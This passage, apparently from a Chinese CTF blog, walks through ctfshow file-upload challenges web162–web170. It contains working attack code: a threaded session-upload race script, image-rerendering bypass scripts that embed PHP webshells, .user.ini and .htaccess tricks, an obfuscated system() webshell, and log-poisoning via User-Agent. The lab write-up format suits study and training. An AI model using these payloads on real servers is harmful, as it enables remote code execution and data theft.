<img data-src="\images\article_images\image-20250819181656530.png" alt="image-20250819181656530" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>查看访问 <code>靶机/upload/index.php</code> 的包的爆破结果</strong></p>
<p><strong>根据 <code>Length</code> 长度的不同找到命令的回显</strong></p>
<img data-src="\images\article_images\image-20250819181614865.png" alt="image-20250819181614865" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code>，加上 <code>GIF86a</code></strong></p>
<pre><code class="php">GIF89a
auto_prepend_file=/tmp/sess_love
</code></pre>
<img data-src="\images\article_images\image-20250819181816577.png" alt="image-20250819181816577" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>脚本实现条件竞争</strong></p>
<img data-src="\images\article_images\image-20250819194618891.png" alt="image-20250819194618891" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>多线程并发注入脚本</strong></p>
<pre><code class="python">import io
import requests
import threading
import time

# === [1] 靶机地址 ===
url = &#39;http://b20a06b7-799e-48aa-a105-0e1827adbf09.challenge.ctf.show/&#39;

# === [2] 自定义参数 ===
PHPSESSID = &#39;love&#39;
PAYLOAD = &#39;&lt;?php system(&quot;cat ../flag.php&quot;);?&gt;aaaaa&#39;   # 修改命令，自定义标识符
IDENTIFIER = &#39;aaaaa&#39;  # 用于判断是否成功执行
TARGET_SESS_PATH = &#39;upload/index.php&#39;    # 修改读取地址

# === [3] 线程控制器 ===
found_flag = threading.Event()

# === [4] 上传线程：持续伪造上传进度 ===
def upload_payload(session, thread_id):
    data = &#123;
        &#39;PHP_SESSION_UPLOAD_PROGRESS&#39;: PAYLOAD
    &#125;

    while not found_flag.is_set():
        try:
            fake_file = io.BytesIO(b&#39;A&#39; * 1024 * 10)  # 10KB 文件
            session.post(
                url,
                cookies=&#123;&#39;PHPSESSID&#39;: PHPSESSID&#125;,
                data=data,
                files=&#123;&#39;file&#39;: (f&#39;upload_&#123;thread_id&#125;.txt&#39;, fake_file)&#125;,
                timeout=3
            )
            print(f&#39;[Upload-&#123;thread_id&#125;] Upload OK&#39;)
        except Exception as e:
            print(f&#39;[Upload-&#123;thread_id&#125;] Error: &#123;e&#125;&#39;)

# === [5] 读取线程：不断读取 sess 文件，等待触发执行 ===
def read_session(session, thread_id):
    while not found_flag.is_set():
        try:
            response = session.get(f&#39;&#123;url&#125;&#123;TARGET_SESS_PATH&#125;&#39;, timeout=2)     # 修改靶机读取地址
            if IDENTIFIER in response.text:
                print(f&#39;\n[+] [Read-&#123;thread_id&#125;] Payload executed successfully!\n&#39;)
                print(response.text)
                found_flag.set()
                break
            else:
                print(f&#39;[-] [Read-&#123;thread_id&#125;] Not ready&#39;)
        except Exception as e:
            print(f&#39;[Read-&#123;thread_id&#125;] Error: &#123;e&#125;&#39;)
        time.sleep(0.2)

# === [6] 主控函数：并发调度线程 ===
def main():
    session = requests.Session()
    threads = []

    # 启动多个上传线程
    for i in range(3):
        t = threading.Thread(target=upload_payload, args=(session, i))
        t.daemon = True
        t.start()
        threads.append(t)

    # 启动多个读取线程
    for i in range(5):
        t = threading.Thread(target=read_session, args=(session, i))
        t.daemon = True
        t.start()
        threads.append(t)

    # 等待直到有线程设置 found_flag
    while not found_flag.is_set():
        time.sleep(0.2)

    print(&quot;\n[+] Done. Exiting all threads.&quot;)

# === [7] 执行入口 ===
if __name__ == &#39;__main__&#39;:
    main()
</code></pre>
<p>&nbsp;</p>
<hr>
<h1 id="web163"><a href="#web163" class="headerlink" title="web163"></a>web163</h1><p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>php伪协议</strong></p>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>同 web162：BurpSuite内条件竞争</strong></p>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解三&#x3D;&#x3D;</strong></p>
<p><strong>上传 <code>1.png</code> 并抓包，重命名为 <code>.user.ini</code>，加上 <code>GIF86a</code></strong></p>
<pre><code class="php">GIF89a
auto_prepend_file=/tmp/sess_love
</code></pre>
<img data-src="\images\article_images\image-20250819212648602.png" alt="image-20250819212648602" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>脚本实现条件竞争</strong></p>
<img data-src="\images\article_images\image-20250819212528233.png" alt="image-20250819212528233" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>多线程并发注入脚本</strong></p>
<pre><code class="python">import io
import requests
import threading
import time

# === [1] 靶机地址 ===
url = &#39;http://68227ebf-cab1-4403-9a8c-86cda1177f67.challenge.ctf.show/&#39;

# === [2] 自定义参数 ===
PHPSESSID = &#39;love&#39;
PAYLOAD = &#39;&lt;?php system(&quot;tac ../flag.php&quot;);?&gt;aaaaa&#39;   # 修改命令，自定义标识符
IDENTIFIER = &#39;aaaaa&#39;  # 在回显里找 aaaaa; 用于判断是否成功执行
TARGET_SESS_PATH = &#39;upload/index.php&#39;    # 修改读取地址

# === [3] 线程控制器 ===
found_flag = threading.Event()

# === [4] 上传线程：持续伪造上传进度 ===
def upload_payload(session, thread_id):
    data = &#123;
        &#39;PHP_SESSION_UPLOAD_PROGRESS&#39;: PAYLOAD
    &#125;

    while not found_flag.is_set():
        try:
            fake_file = io.BytesIO(b&#39;A&#39; * 1024 * 10)  # 10KB 文件
            session.post(
                url,
                cookies=&#123;&#39;PHPSESSID&#39;: PHPSESSID&#125;,
                data=data,
                files=&#123;&#39;file&#39;: (f&#39;upload_&#123;thread_id&#125;.txt&#39;, fake_file)&#125;,
                timeout=3
            )
            print(f&#39;[Upload-&#123;thread_id&#125;] Upload OK&#39;)
        except Exception as e:
            print(f&#39;[Upload-&#123;thread_id&#125;] Error: &#123;e&#125;&#39;)

# === [5] 读取线程：不断读取 sess 文件，等待触发执行 ===
def read_session(session, thread_id):
    while not found_flag.is_set():
        try:
            response = session.get(f&#39;&#123;url&#125;&#123;TARGET_SESS_PATH&#125;&#39;, timeout=2)     # 修改靶机读取地址
            if IDENTIFIER in response.text:
                print(f&#39;\n[+] [Read-&#123;thread_id&#125;] Payload executed successfully!\n&#39;)
                print(response.text)
                found_flag.set()
                break
            else:
                print(f&#39;[-] [Read-&#123;thread_id&#125;] Not ready&#39;)
        except Exception as e:
            print(f&#39;[Read-&#123;thread_id&#125;] Error: &#123;e&#125;&#39;)
        time.sleep(0.2)

# === [6] 主控函数：并发调度线程 ===
def main():
    session = requests.Session()
    threads = []

    # 启动多个上传线程
    for i in range(3):
        t = threading.Thread(target=upload_payload, args=(session, i))
        t.daemon = True
        t.start()
        threads.append(t)

    # 启动多个读取线程
    for i in range(5):
        t = threading.Thread(target=read_session, args=(session, i))
        t.daemon = True
        t.start()
        threads.append(t)

    # 等待直到有线程设置 found_flag
    while not found_flag.is_set():
        time.sleep(0.2)

    print(&quot;\n[+] Done. Exiting all threads.&quot;)

# === [7] 执行入口 ===
if __name__ == &#39;__main__&#39;:
    main()
</code></pre>
<p>&nbsp;</p>
<hr>
<h1 id="web164"><a href="#web164" class="headerlink" title="web164"></a>web164</h1><p><strong><code>png</code> 二次渲染与绕过</strong></p>
<p><strong>1.二次渲染？</strong></p>
<ul>
<li><strong>定义</strong>：当用户上传文件（如图片、文档）后，网站会对文件进行再处理（即二次渲染），以适配显示需求或进行安全过滤。</li>
<li><strong>常见原因</strong>：<ol>
<li><strong>适配展示</strong>：压缩、缩放图片，转换格式（如 PNG → JPG）。</li>
<li><strong>安全考虑</strong>：清理潜在木马代码，防止图片木马、恶意脚本注入。</li>
</ol>
</li>
</ul>
<p><strong>2.二次渲染的影响</strong></p>
<ul>
<li>用户上传的原始文件和服务器保存的文件 <strong>并不完全一致</strong>。</li>
<li>如果攻击者直接在文件中写入 Webshell，很可能在渲染过程中被修改或清理掉。</li>
</ul>
<p><strong>3.绕过二次渲染的思路</strong></p>
<p><strong>（1）对比差异</strong></p>
<ul>
<li>将上传前的源文件与上传后的处理结果进行比对。</li>
<li>找出哪些数据段被修改、哪些数据段保持不变。</li>
</ul>
<p><strong>（2）选择安全区域</strong></p>
<ul>
<li>在 <strong>不会被二次渲染修改的数据区域</strong> 插入恶意代码。</li>
<li>这样上传后的文件仍然包含可执行的后门代码。</li>
</ul>
<p><strong>4.需要脚本</strong></p>
<ul>
<li><p>文件渲染后的差异分布 <strong>复杂且不可预测</strong>。</p>
</li>
<li><p>手工分析、插入代码几乎不可能成功。</p>
</li>
<li><p>需要使用脚本来自动：</p>
<p>（1）上传 → 下载已渲染文件</p>
<p>（2）比对文件差异</p>
<p>（3）在合适位置自动写入恶意代码</p>
<p>（4）重新构造“图片马”并循环测试</p>
</li>
</ul>
<p>&nbsp;</p>
<p><strong>查看源代码</strong></p>
<img data-src="\images\article_images\image-20250820003944731.png" alt="image-20250820003944731" style="zoom:25%;" />

<pre><code class="html">&lt;/div&gt;
&lt;script src=&quot;js/layui.js&quot;&gt;&lt;/script&gt;
&lt;script&gt;
layui.use(&#39;upload&#39;, function()&#123;
  var upload = layui.upload;
   
  //执行实例
  var uploadInst = upload.render(&#123;
    elem: &#39;#upload&#39; //绑定元素
    ,url: &#39;/upload/&#39; //上传接口
    ,done: function(res)&#123;
        if(res.code==0)&#123;
            $(&quot;#result&quot;).html(&quot;文件上传成功 &lt;a href=&#39;download.php?image=&quot;+res.msg+&quot;&#39; target=&#39;_blank&#39;&gt;查看图片&lt;/a&gt;&quot;);
        &#125;else&#123;
            $(&quot;#result&quot;).html(&quot;文件上传失败，失败原因：&quot;+res.msg);
        &#125;
      
    &#125;
    ,error: function()&#123;
      $(&quot;#result&quot;).html(&quot;文件上传失败&quot;);
    &#125;
  &#125;);
&#125;);
</code></pre>
<p>&nbsp;</p>
<p><strong>可以看到源代码有个 <code>download.php?image=</code>，基本确定考点为二次渲染</strong></p>
<p>&nbsp;</p>
<p><strong>利用脚本生成 <code>png</code> 图，其内容为 <code>&lt;?$_GET[0]($_POST[1]);?&gt;</code></strong></p>
<pre><code class="php">&lt;?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
 
 
 
$img = imagecreatetruecolor(32, 32);
 
for ($y = 0; $y &lt; sizeof($p); $y += 3) &#123;
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
&#125;
 
imagepng($img,&#39;re_encoded.png&#39;);
</code></pre>
<img data-src="\images\article_images\image-20250820004455587.png" alt="image-20250820004455587" style="zoom: 25%;" />



<p>&nbsp;</p>
<p><strong>上传脚本生成的木马图，查看图片</strong></p>
<pre><code class="php">#GET
靶机?image=...&amp;0=system

#POST
1=ls
</code></pre>
<img data-src="\images\article_images\image-20250820004726742.png" alt="image-20250820004726742" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>将图片保存下来，查看图片内容</strong></p>
<img data-src="\images\article_images\image-20250820003154047.png" alt="image-20250820003154047" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
靶机?image=...&amp;0=system

#POST
1=tac flag.php
</code></pre>
<img data-src="\images\article_images\image-20250820004912573.png" alt="image-20250820004912573" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>将图片保存下来，查看图片内容</strong></p>
<img data-src="\images\article_images\image-20250820003757010.png" alt="image-20250820003757010" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web165"><a href="#web165" class="headerlink" title="web165"></a>web165</h1><p><strong><code>jpg</code> 二次渲染</strong></p>
<p>&nbsp;</p>
<p><strong>将这张 <code>jpg</code> 图片上传经过一次渲染后下载下来</strong></p>
<img data-src="\images\article_images\image-20250820135624000.png" alt="image-20250820135624000" style="zoom:10%;" />

<p>&nbsp;</p>
<p><strong>将下载后的 <code>jpg</code> 图片用脚本进行处理得到二次渲染后的 <code>jpg</code> 图片</strong></p>
<img data-src="\images\article_images\image-20250820135534124.png" alt="image-20250820135534124" style="zoom:25%;" />

<pre><code class="php">&lt;?php
    /*
    将 payload 注入到 JPG 图片的算法，可以保证在经过 PHP 函数 imagecopyresized() 和 imagecopyresampled() 转换后仍然保持不变。
    要求：初始图片的大小和质量必须与处理后的图片一致。

    步骤：
    1) 通过安全的文件上传脚本上传任意一张图片；
    2) 保存处理后的图片，然后执行：
    jpg_payload.php &lt;jpg_name.jpg&gt;

    如果注入成功，你会得到一张特殊构造的图片，需要再次上传。

    注意可能的问题：
    1) 经过第二次处理后，注入的数据可能会部分损坏；
    2) jpg_payload.php 脚本输出 &quot;Something&#39;s wrong&quot;。
    如果遇到这种情况，可以尝试修改 payload（例如在开头加一些符号），或者换一张初始图片再试。

    */

    $miniPayload = &#39;&lt;?=eval($_POST[1]);?&gt;&#39;;         # 修改命令


    if(!extension_loaded(&#39;gd&#39;) || !function_exists(&#39;imagecreatefromjpeg&#39;)) &#123;
        die(&#39;php-gd is not installed&#39;);
    &#125;
    
    if(!isset($argv[1])) &#123;
        die(&#39;php jpg_payload.php &lt;jpg_name.jpg&gt;&#39;);
    &#125;

    set_error_handler(&quot;custom_error_handler&quot;);

    for($pad = 0; $pad &lt; 1024; $pad++) &#123;
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis-&gt;readShort() != 0xFFD8) &#123;
            die(&#39;Incorrect SOI marker&#39;);
        &#125;

        while((!$dis-&gt;eof()) &amp;&amp; ($dis-&gt;readByte() == 0xFF)) &#123;
            $marker = $dis-&gt;readByte();
            $size = $dis-&gt;readShort() - 2;
            $dis-&gt;skip($size);
            if($marker === 0xDA) &#123;
                $startPos = $dis-&gt;seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat(&quot;\0&quot;,$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage(&#39;_&#39;.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) &#123;
                    while((!$dis-&gt;eof())) &#123;
                        if($dis-&gt;readByte() === 0xFF) &#123;
                            if($dis-&gt;readByte !== 0x00) &#123;
                                break;
                            &#125;
                        &#125;
                    &#125;
                    $stopPos = $dis-&gt;seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat(&quot;\0&quot;,$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                &#125; elseif($correctImage) &#123;
                    $outStream = $outStreamTmp;
                &#125; else &#123;
                    break;
                &#125;
                if(checkImage(&#39;payload_&#39;.$argv[1], $outStream)) &#123;
                    die(&#39;Success!&#39;);
                &#125; else &#123;
                    break;
                &#125;
            &#125;
        &#125;
    &#125;
    unlink(&#39;payload_&#39;.$argv[1]);
    die(&#39;Something\&#39;s wrong&#39;);

    function checkImage($filename, $data, $unlink = FALSE) &#123;
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    &#125;

    function custom_error_handler($errno, $errstr, $errfile, $errline) &#123;
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match(&#39;/(\d+) extraneous bytes before marker/&#39;, $errstr, $m)) &#123;
            if(isset($m[1])) &#123;
                $extraBytes = (int)$m[1];
            &#125;
        &#125;
    &#125;

    class DataInputStream &#123;
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) &#123;
            $this-&gt;binData = &#39;&#39;;
            $this-&gt;order = $order;
            if(!$fromString) &#123;
                if(!file_exists($filename) || !is_file($filename))
                    die(&#39;File not exists [&#39;.$filename.&#39;]&#39;);
                $this-&gt;binData = file_get_contents($filename);
            &#125; else &#123;
                $this-&gt;binData = $filename;
            &#125;
            $this-&gt;size = strlen($this-&gt;binData);
        &#125;

        public function seek() &#123;
            return ($this-&gt;size - strlen($this-&gt;binData));
        &#125;

        public function skip($skip) &#123;
            $this-&gt;binData = substr($this-&gt;binData, $skip);
        &#125;

        public function readByte() &#123;
            if($this-&gt;eof()) &#123;
                die(&#39;End Of File&#39;);
            &#125;
            $byte = substr($this-&gt;binData, 0, 1);
            $this-&gt;binData = substr($this-&gt;binData, 1);
            return ord($byte);
        &#125;

        public function readShort() &#123;
            if(strlen($this-&gt;binData) &lt; 2) &#123;
                die(&#39;End Of File&#39;);
            &#125;
            $short = substr($this-&gt;binData, 0, 2);
            $this-&gt;binData = substr($this-&gt;binData, 2);
            if($this-&gt;order) &#123;
                $short = (ord($short[1]) &lt;&lt; 8) + ord($short[0]);
            &#125; else &#123;
                $short = (ord($short[0]) &lt;&lt; 8) + ord($short[1]);
            &#125;
            return $short;
        &#125;

        public function eof() &#123;
            return !$this-&gt;binData||(strlen($this-&gt;binData) === 0);
        &#125;
    &#125;
?&gt;
</code></pre>
<p>&nbsp;</p>
<p><strong>将二次渲染的 <code>jpg</code> 图片上传</strong></p>
<p><strong>POST</strong></p>
<pre><code class="php">1=system(&quot;ls &gt; 1.txt&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250820113228183.png" alt="image-20250820113228183" style="zoom:25%;" />



<p>&nbsp;</p>
<pre><code class="php">/1.txt
</code></pre>
<img data-src="\images\article_images\image-20250820113138020.png" alt="image-20250820113138020" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>POST并抓包</strong></p>
<pre><code class="php">1=system(&quot;tac flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250820114058648.png" alt="image-20250820114058648" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>在 BurpSuite 中可查看回显flag</strong></p>
<img data-src="\images\article_images\image-20250820114022894.png" alt="image-20250820114022894" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web166"><a href="#web166" class="headerlink" title="web166"></a>web166</h1><p><strong>查看源代码，上传文件类型为 <code>zip</code></strong></p>
<img data-src="\images\article_images\image-20250820142602579.png" alt="image-20250820142602579" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>zip</code> 文件，同时抓包，在BurpSuite里查看回显</strong></p>
<img data-src="\images\article_images\image-20250820143914089.png" alt="image-20250820143914089" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问上传的页面，进行命令执行</strong></p>
<pre><code class="php">/upload/download.php?file=d8d1765751f2bb304893c0cf64322205.zip

a=system(&quot;ls ../&quot;)
</code></pre>
<img data-src="\images\article_images\image-20250820143750984.png" alt="image-20250820143750984" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">/upload/download.php?file=d8d1765751f2bb304893c0cf64322205.zip

a=system(&quot;tac ../flag.php&quot;)
</code></pre>
<img data-src="\images\article_images\image-20250820143820666.png" alt="image-20250820143820666" style="zoom:25%;" />



<p>&nbsp;</p>
<hr>
<h1 id="web167"><a href="#web167" class="headerlink" title="web167"></a>web167</h1><p><strong><code>.user.ini</code> 可以用于多种服务器，但前提是同级目录下必须有一个php文件</strong></p>
<p>&nbsp;</p>
<p><strong><code>.htaccess</code> 文件（只能用于 Apache 服务器）</strong></p>
<ul>
<li><strong>定义</strong>：<code>.htaccess</code>（Hypertext Access）是 <strong>Apache Web 服务器</strong>中的一种<strong>分布式配置文件</strong>。</li>
<li><strong>作用范围</strong>：它对<strong>所在目录</strong>及其子目录生效。</li>
<li><strong>优先级</strong>：配置优先级低于 Apache 主配置文件 <code>httpd.conf</code>，但可以用来做目录级别的灵活控制。</li>
</ul>
<p><strong>常见功能</strong></p>
<p><strong>1.网页跳转（301&#x2F;302）</strong></p>
<ul>
<li>用于把旧页面永久&#x2F;临时重定向到新页面。</li>
</ul>
<pre><code class="ini">Redirect 301 /old-page.html http://example.com/new-page.html
Redirect 302 /temp-page.html http://example.com/temporary.html
</code></pre>
<p><strong>2.自定义错误页面</strong></p>
<ul>
<li>可以指定 404、403、500 等错误的自定义页面。</li>
</ul>
<pre><code class="ini">ErrorDocument 404 /404.html
ErrorDocument 403 /forbidden.html
</code></pre>
<p>3.<strong>修改文件扩展名对应的 MIME 类型</strong></p>
<ul>
<li>比如把 <code>.php5</code> 文件当作 PHP 解析：</li>
</ul>
<pre><code class="ini">AddType application/x-httpd-php .php5
</code></pre>
<p><strong>4.访问控制（白名单&#x2F;黑名单）</strong></p>
<ul>
<li>禁止特定 IP 访问：</li>
</ul>
<pre><code class="ini">Deny from 192.168.1.100
</code></pre>
<ul>
<li>只允许特定 IP 访问：</li>
</ul>
<pre><code class="ini">Order deny,allow
Deny from all
Allow from 192.168.1.101
</code></pre>
<p><strong>5.禁止目录列表</strong></p>
<ul>
<li>如果目录中没有 <code>index.html</code>，默认 Apache 会列出目录内容。</li>
<li>可以关闭：</li>
</ul>
<pre><code class="ini">Options -Indexes
</code></pre>
<p><strong>6.设置默认首页</strong></p>
<ul>
<li>定义访问目录时的默认文件：</li>
</ul>
<pre><code class="ini">DirectoryIndex index.php index.html
</code></pre>
<p><strong>7.URL 重写（Rewrite）</strong></p>
<ul>
<li>需要启用 <code>mod_rewrite</code> 模块，常用于伪静态、SEO 优化：</li>
</ul>
<pre><code class="ini">RewriteEngine On
RewriteRule ^article/([0-9]+)$ article.php?id=$1 [L]
</code></pre>
<p>&nbsp;</p>
<pre><code class="php">AddType application/x-httpd-php .jpg   //将.jpg后缀的文件解析 成php

SetHandler application/x-httpd-php    //将所有文件都解析为 php 文件
</code></pre>
<p>&nbsp;</p>
<p><strong>制作 <code>png</code> 图片，内容为 <code>AddType application/x-httpd-php .jpg</code> ，上传并抓包</strong></p>
<p><strong>在 BurpSuite 中修改文件名为 <code>.htaccess</code> 后 <code>Send</code></strong></p>
<img data-src="\images\article_images\image-20250820164020304.png" alt="image-20250820164020304" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传木马图 <code>png</code></strong></p>
<img data-src="\images\article_images\image-20250820164042560.png" alt="image-20250820164042560" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>命令执行</strong></p>
<pre><code class="php"># GET
/upload/1.jpg

# POST
a=system(&quot;tac ../flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250820163944646.png" alt="image-20250820163944646" style="zoom: 25%;" />



<p>&nbsp;</p>
<hr>
<h1 id="web168"><a href="#web168" class="headerlink" title="web168"></a>web168</h1><p><strong>制作内容如下的 <code>png</code> 图片</strong></p>
<pre><code class="php">&lt;?php
$a = &quot;s#y#s#t#e#m&quot;;
$b = explode(&quot;#&quot;,$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?&gt;
</code></pre>
<p>&nbsp;</p>
<p><strong>上传 <code>webshell.png</code> 后抓包，在BurpSuite中修改文件名后缀为 <code>php</code></strong></p>
<img data-src="\images\article_images\image-20250821011210389.png" alt="image-20250821011210389" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>靶机/upload/webshell/php</code> 进行命令执行</strong></p>
<pre><code class="php"># GET
/upload/webshell.php

# POST
1=ls ../
</code></pre>
<img data-src="\images\article_images\image-20250821011003318.png" alt="image-20250821011003318" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php"># GET
/upload/webshell.php

# POST
1=tac ../flagaa.php
</code></pre>
<img data-src="\images\article_images\image-20250821011049047.png" alt="image-20250821011049047" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web169"><a href="#web169" class="headerlink" title="web169"></a>web169</h1><p><strong>查看源代码，上传文件类型为 <code>zip</code></strong></p>
<img data-src="\images\article_images\image-20250821165440610.png" alt="image-20250821165440610" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>zip</code> 文件并抓包，在 BurpSuite 中修改 <code>Content-Type:</code> 类型为 <code>image/png</code></strong>  </p>
<p><strong>修改文件后缀名为 <code>1.php</code></strong></p>
<p><strong>在 <code>User-Agent</code> 添加一句话木马 <code>&lt;?php @eval($_POST[a]);?&gt;</code></strong></p>
<pre><code class="php">Content-Type: image/png

# User-Agent
&lt;?php @eval($_POST[a]);?&gt;
</code></pre>
<p><strong>修改后 <code>Send</code></strong></p>
<img data-src="\images\article_images\image-20250821165835463.png" alt="image-20250821165835463" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>再上传一个文件后在BurpSuite中修改为 <code>.user.ini</code></strong></p>
<pre><code class="php">auto_prepend_file=/var/log/nginx/access.log
</code></pre>
<img data-src="\images\article_images\image-20250821170042049.png" alt="image-20250821170042049" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>命令执行</strong></p>
<pre><code class="php">#GET
/upload/1.php

#POST
a=system(&quot;ls ../&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250821170556956.png" alt="image-20250821170556956" style="zoom:25%;" />

<p>&nbsp;</p>
<pre><code class="php">#GET
/upload/1.php

#POST
a=system(&quot;tac ../flagaa.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250821170652567.png" alt="image-20250821170652567" style="zoom:25%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web170"><a href="#web170" class="headerlink" title="web170"></a>web170</h1><p><strong>查看源代码，上传文件类型为 <code>zip</code></strong></p>
<img data-src="\images\article_images\image-20250821165440610.png" alt="image-20250821165440610" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>上传 <code>zip</code> 文件并抓包，在 BurpSuite 中修改 <code>Content-Type:</code> 类型为 <code>image/png</code></strong>  </p>
<p><strong>修改文件后缀名为 <code>1.php</code></strong></p>
<p><strong>在 <code>User-Agent</code> 添加一句话木马 <code>&lt;?php @eval($_POST[a]);?&gt;</code></strong></p>
<pre><code class="php">Content-Type: image/png

# User-Agent
&lt;?php @eval($_POST[a]);?&gt;
</code></pre>
<p><strong>修改后 <code>Send</code></strong></p>
<img data-src="\images\article_images\image-20250821172331063.png" alt="image-20250821172331063" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>再上传一个文件后在BurpSuite中修改为 <code>.user.ini</code></strong></p>
<pre><code class="php">auto_prepend_file=/var/log/nginx/access.log
</code></pre>
<img data-src="\images\article_images\image-20250821172439983.png" alt="image-20250821172439983" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>命令执行</strong></p>
<pre><code class="php">#GET
/upload/1.php

#POST
a=system(&quot;tac ../flagaa.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250821172606300.png" alt="image-20250821172606300" style="zoom:25%;" />






      <div class="tags">
          <a href="/tags/CTF/" rel="tag"><i class="ic i-tag"></i> CTF</a>
          <a href="/tags/Web/" rel="tag"><i class="ic i-tag"></i> Web</a>
          <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag"><i class="ic i-tag"></i> 文件上传</a>
          <a href="/tags/%E6%9C%A8%E9%A9%AC%E4%B8%8A%E4%BC%A0/" rel="tag"><i class="ic i-tag"></i> 木马上传</a>
          <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8CRCE/" rel="tag"><i class="ic i-tag"></i> 命令执行RCE</a>
          <a href="/tags/%E6%97%A5%E5%BF%97%E5%8C%85%E5%90%AB/" rel="tag"><i class="ic i-tag"></i> 日志包含</a>
          <a href="/tags/Linux%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4/" rel="tag"><i class="ic i-tag"></i> Linux系统命令</a>
          <a href="/tags/session%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89/" rel="tag"><i class="ic i-tag"></i> session条件竞争</a>
          <a href="/tags/Webshell/" rel="tag"><i class="ic i-tag"></i> Webshell</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2025-09-06 20:14:55" itemprop="dateModified" datetime="2025-09-06T20:14:55+08:00">2025-09-06</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>AlgoZZi <i class="ic i-at"><em>@</em></i>不说永远  珍惜现在
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2025/09/06/ctfshow%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="ctfshow文件上传">http://example.com/2025/09/06/ctfshow文件上传/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

